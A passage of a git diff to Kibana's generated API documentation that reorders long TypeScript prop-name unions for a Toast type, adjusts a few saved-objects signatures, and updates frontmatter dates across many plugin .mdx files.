\"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | 
\"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\" | \"data-test-subj\"> & { title?: string | ", "MountPoint", " | undefined; text?: string | ", "MountPoint", 
@@ -696,7 +696,7 @@ "signature": [ "Pick<", "Toast", - ", \"children\" | \"color\" | \"className\" | \"lang\" | \"style\" | \"role\" | \"tabIndex\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChange\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onError\" | \"onErrorCapture\" | \"onKeyDown\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | 
\"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClick\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | 
\"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"data-test-subj\" | \"hidden\" | \"security\" | \"defaultValue\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"translate\" | \"radioGroup\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\"> & { title?: string | ", + ", \"children\" | \"onError\" | \"hidden\" | \"color\" | \"className\" | \"onChange\" | \"onKeyDown\" | \"onClick\" | \"security\" | \"defaultValue\" | \"lang\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"style\" | \"tabIndex\" | \"translate\" | \"radioGroup\" | \"role\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | 
\"is\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onErrorCapture\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | 
\"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | 
\"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\" | \"data-test-subj\"> & { title?: string | ", "MountPoint", " | undefined; text?: string | ", "MountPoint", diff --git a/api_docs/kbn_core_notifications_browser.mdx b/api_docs/kbn_core_notifications_browser.mdx index bbd7b53a71eeb..31b80abeb8b2f 100644 --- a/api_docs/kbn_core_notifications_browser.mdx +++ b/api_docs/kbn_core_notifications_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-notifications-browser title: "@kbn/core-notifications-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-notifications-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-notifications-browser'] --- import kbnCoreNotificationsBrowserObj from './kbn_core_notifications_browser.devdocs.json'; diff --git a/api_docs/kbn_core_notifications_browser_internal.mdx b/api_docs/kbn_core_notifications_browser_internal.mdx index b98f505020ec6..123ef66517165 100644 --- a/api_docs/kbn_core_notifications_browser_internal.mdx +++ b/api_docs/kbn_core_notifications_browser_internal.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-notifications-browser-internal title: "@kbn/core-notifications-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-notifications-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-notifications-browser-internal'] --- import kbnCoreNotificationsBrowserInternalObj from './kbn_core_notifications_browser_internal.devdocs.json'; diff --git a/api_docs/kbn_core_notifications_browser_mocks.mdx b/api_docs/kbn_core_notifications_browser_mocks.mdx index e958ad843e888..c574a847485e1 100644 --- a/api_docs/kbn_core_notifications_browser_mocks.mdx +++ b/api_docs/kbn_core_notifications_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-notifications-browser-mocks title: "@kbn/core-notifications-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-notifications-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-notifications-browser-mocks'] --- import kbnCoreNotificationsBrowserMocksObj from './kbn_core_notifications_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_overlays_browser.devdocs.json b/api_docs/kbn_core_overlays_browser.devdocs.json index 37ccf6337584b..dc76f84740ba1 100644 --- a/api_docs/kbn_core_overlays_browser.devdocs.json +++ b/api_docs/kbn_core_overlays_browser.devdocs.json @@ -293,7 +293,7 @@ "label": "size", "description": [], "signature": [ - "\"s\" | \"m\" | \"l\" | undefined" + "\"m\" | \"s\" | \"l\" | undefined" ], "path": "packages/core/overlays/core-overlays-browser/src/flyout.ts", "deprecated": false diff --git a/api_docs/kbn_core_overlays_browser.mdx b/api_docs/kbn_core_overlays_browser.mdx index 6a4157f533fd3..966b72684ebf4 100644 --- a/api_docs/kbn_core_overlays_browser.mdx +++ b/api_docs/kbn_core_overlays_browser.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-overlays-browser title: "@kbn/core-overlays-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-overlays-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-overlays-browser'] --- import kbnCoreOverlaysBrowserObj from './kbn_core_overlays_browser.devdocs.json'; diff --git a/api_docs/kbn_core_overlays_browser_internal.mdx b/api_docs/kbn_core_overlays_browser_internal.mdx index 44482d0e67407..3138b6a75f20a 100644 --- a/api_docs/kbn_core_overlays_browser_internal.mdx +++ b/api_docs/kbn_core_overlays_browser_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-overlays-browser-internal title: "@kbn/core-overlays-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-overlays-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-overlays-browser-internal'] --- import kbnCoreOverlaysBrowserInternalObj from './kbn_core_overlays_browser_internal.devdocs.json'; diff --git a/api_docs/kbn_core_overlays_browser_mocks.mdx b/api_docs/kbn_core_overlays_browser_mocks.mdx index 450ab00896eef..01e1c7fd5c768 100644 --- a/api_docs/kbn_core_overlays_browser_mocks.mdx +++ b/api_docs/kbn_core_overlays_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-overlays-browser-mocks title: "@kbn/core-overlays-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-overlays-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-overlays-browser-mocks'] --- import kbnCoreOverlaysBrowserMocksObj from './kbn_core_overlays_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_preboot_server.mdx b/api_docs/kbn_core_preboot_server.mdx index b98c9488b9b79..80bf8e728fba4 100644 
--- a/api_docs/kbn_core_preboot_server.mdx +++ b/api_docs/kbn_core_preboot_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-preboot-server title: "@kbn/core-preboot-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-preboot-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-preboot-server'] --- import kbnCorePrebootServerObj from './kbn_core_preboot_server.devdocs.json'; diff --git a/api_docs/kbn_core_preboot_server_mocks.mdx b/api_docs/kbn_core_preboot_server_mocks.mdx index 45fb3e004c135..f9273822f0e85 100644 --- a/api_docs/kbn_core_preboot_server_mocks.mdx +++ b/api_docs/kbn_core_preboot_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-preboot-server-mocks title: "@kbn/core-preboot-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-preboot-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-preboot-server-mocks'] --- import kbnCorePrebootServerMocksObj from './kbn_core_preboot_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_saved_objects_api_browser.devdocs.json b/api_docs/kbn_core_saved_objects_api_browser.devdocs.json index 84e904ed0d0aa..82b771de6f513 100644 --- a/api_docs/kbn_core_saved_objects_api_browser.devdocs.json +++ b/api_docs/kbn_core_saved_objects_api_browser.devdocs.json 
@@ -1675,9 +1675,9 @@ "label": "SavedObjectsFindOptions", "description": [], "signature": [ - "{ type: string | string[]; filter?: any; search?: string | undefined; page?: number | undefined; aggs?: Record | undefined; fields?: string[] | undefined; perPage?: number | undefined; sortField?: string | undefined; searchFields?: string[] | undefined; hasReference?: ", + "> | undefined; fields?: string[] | undefined; page?: number | undefined; perPage?: number | undefined; sortField?: string | undefined; searchFields?: string[] | undefined; hasReference?: ", "SavedObjectsFindOptionsReference", " | ", "SavedObjectsFindOptionsReference", diff --git a/api_docs/kbn_core_saved_objects_api_browser.mdx b/api_docs/kbn_core_saved_objects_api_browser.mdx index a476d80171d60..b093ba0d04676 100644 --- a/api_docs/kbn_core_saved_objects_api_browser.mdx +++ b/api_docs/kbn_core_saved_objects_api_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-saved-objects-api-browser title: "@kbn/core-saved-objects-api-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-saved-objects-api-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-saved-objects-api-browser'] --- import kbnCoreSavedObjectsApiBrowserObj from './kbn_core_saved_objects_api_browser.devdocs.json'; diff --git a/api_docs/kbn_core_saved_objects_api_server.mdx b/api_docs/kbn_core_saved_objects_api_server.mdx index b1bc929b5dce4..9ae400347f8e6 100644 --- a/api_docs/kbn_core_saved_objects_api_server.mdx +++ b/api_docs/kbn_core_saved_objects_api_server.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-saved-objects-api-server title: "@kbn/core-saved-objects-api-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-saved-objects-api-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-saved-objects-api-server'] --- import kbnCoreSavedObjectsApiServerObj from './kbn_core_saved_objects_api_server.devdocs.json'; diff --git a/api_docs/kbn_core_saved_objects_browser.mdx b/api_docs/kbn_core_saved_objects_browser.mdx index 97d899e45810f..5c885e3bafc6c 100644 --- a/api_docs/kbn_core_saved_objects_browser.mdx +++ b/api_docs/kbn_core_saved_objects_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-saved-objects-browser title: "@kbn/core-saved-objects-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-saved-objects-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-saved-objects-browser'] --- import kbnCoreSavedObjectsBrowserObj from './kbn_core_saved_objects_browser.devdocs.json'; diff --git a/api_docs/kbn_core_saved_objects_browser_internal.mdx b/api_docs/kbn_core_saved_objects_browser_internal.mdx index e5b92e6d1a304..e438fba0fadb8 100644 --- a/api_docs/kbn_core_saved_objects_browser_internal.mdx +++ b/api_docs/kbn_core_saved_objects_browser_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-saved-objects-browser-internal title: "@kbn/core-saved-objects-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-saved-objects-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-saved-objects-browser-internal'] --- import kbnCoreSavedObjectsBrowserInternalObj from './kbn_core_saved_objects_browser_internal.devdocs.json'; 
diff --git a/api_docs/kbn_core_saved_objects_browser_mocks.devdocs.json b/api_docs/kbn_core_saved_objects_browser_mocks.devdocs.json index 8c9a3906a2504..17dd93fd31b18 100644 --- a/api_docs/kbn_core_saved_objects_browser_mocks.devdocs.json +++ b/api_docs/kbn_core_saved_objects_browser_mocks.devdocs.json @@ -90,13 +90,12 @@ "SavedObjectsClientContract", ", savedObject: ", "SavedObject", - ") => ", - "SimpleSavedObjectImpl", - "" + ") => jest.Mocked<", + "SimpleSavedObject", + ">" ], "path": "packages/core/saved-objects/core-saved-objects-browser-mocks/src/simple_saved_object.mock.ts", "deprecated": false, - "returnComment": [], "children": [ { "parentPluginId": "@kbn/core-saved-objects-browser-mocks", @@ -109,7 +108,8 @@ "SavedObjectsClientContract" ], "path": "packages/core/saved-objects/core-saved-objects-browser-mocks/src/simple_saved_object.mock.ts", - "deprecated": false + "deprecated": false, + "isRequired": true }, { "parentPluginId": "@kbn/core-saved-objects-browser-mocks", @@ -123,9 +123,11 @@ "" ], "path": "packages/core/saved-objects/core-saved-objects-browser-mocks/src/simple_saved_object.mock.ts", - "deprecated": false + "deprecated": false, + "isRequired": true } - ] + ], + "returnComment": [] } ], "initialIsOpen": false diff --git a/api_docs/kbn_core_saved_objects_browser_mocks.mdx b/api_docs/kbn_core_saved_objects_browser_mocks.mdx index ef90b38e26312..369f23e5fb5ac 100644 --- a/api_docs/kbn_core_saved_objects_browser_mocks.mdx +++ b/api_docs/kbn_core_saved_objects_browser_mocks.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-saved-objects-browser-mocks title: "@kbn/core-saved-objects-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-saved-objects-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-saved-objects-browser-mocks'] --- import kbnCoreSavedObjectsBrowserMocksObj from './kbn_core_saved_objects_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_saved_objects_common.mdx b/api_docs/kbn_core_saved_objects_common.mdx index eb7ed55b31a92..0339d416f73ea 100644 --- a/api_docs/kbn_core_saved_objects_common.mdx +++ b/api_docs/kbn_core_saved_objects_common.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-saved-objects-common title: "@kbn/core-saved-objects-common" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-saved-objects-common plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-saved-objects-common'] --- import kbnCoreSavedObjectsCommonObj from './kbn_core_saved_objects_common.devdocs.json'; diff --git a/api_docs/kbn_core_saved_objects_server.mdx b/api_docs/kbn_core_saved_objects_server.mdx index 92b64df8b2b1e..06b753751b9b8 100644 --- a/api_docs/kbn_core_saved_objects_server.mdx +++ b/api_docs/kbn_core_saved_objects_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-saved-objects-server title: "@kbn/core-saved-objects-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-saved-objects-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-saved-objects-server'] --- import kbnCoreSavedObjectsServerObj from './kbn_core_saved_objects_server.devdocs.json'; 
diff --git a/api_docs/kbn_core_test_helpers_deprecations_getters.mdx b/api_docs/kbn_core_test_helpers_deprecations_getters.mdx index 6f3fcfa3ae5c1..3375249b36daf 100644 --- a/api_docs/kbn_core_test_helpers_deprecations_getters.mdx +++ b/api_docs/kbn_core_test_helpers_deprecations_getters.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-test-helpers-deprecations-getters title: "@kbn/core-test-helpers-deprecations-getters" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-test-helpers-deprecations-getters plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-test-helpers-deprecations-getters'] --- import kbnCoreTestHelpersDeprecationsGettersObj from './kbn_core_test_helpers_deprecations_getters.devdocs.json'; diff --git a/api_docs/kbn_core_test_helpers_http_setup_browser.mdx b/api_docs/kbn_core_test_helpers_http_setup_browser.mdx index d1578d26f614b..1468cd77f9620 100644 --- a/api_docs/kbn_core_test_helpers_http_setup_browser.mdx +++ b/api_docs/kbn_core_test_helpers_http_setup_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-test-helpers-http-setup-browser title: "@kbn/core-test-helpers-http-setup-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-test-helpers-http-setup-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-test-helpers-http-setup-browser'] --- import kbnCoreTestHelpersHttpSetupBrowserObj from './kbn_core_test_helpers_http_setup_browser.devdocs.json'; diff --git a/api_docs/kbn_core_theme_browser.mdx b/api_docs/kbn_core_theme_browser.mdx index 3d553bba1b7bb..89410d56c3973 100644 --- a/api_docs/kbn_core_theme_browser.mdx +++ b/api_docs/kbn_core_theme_browser.mdx 
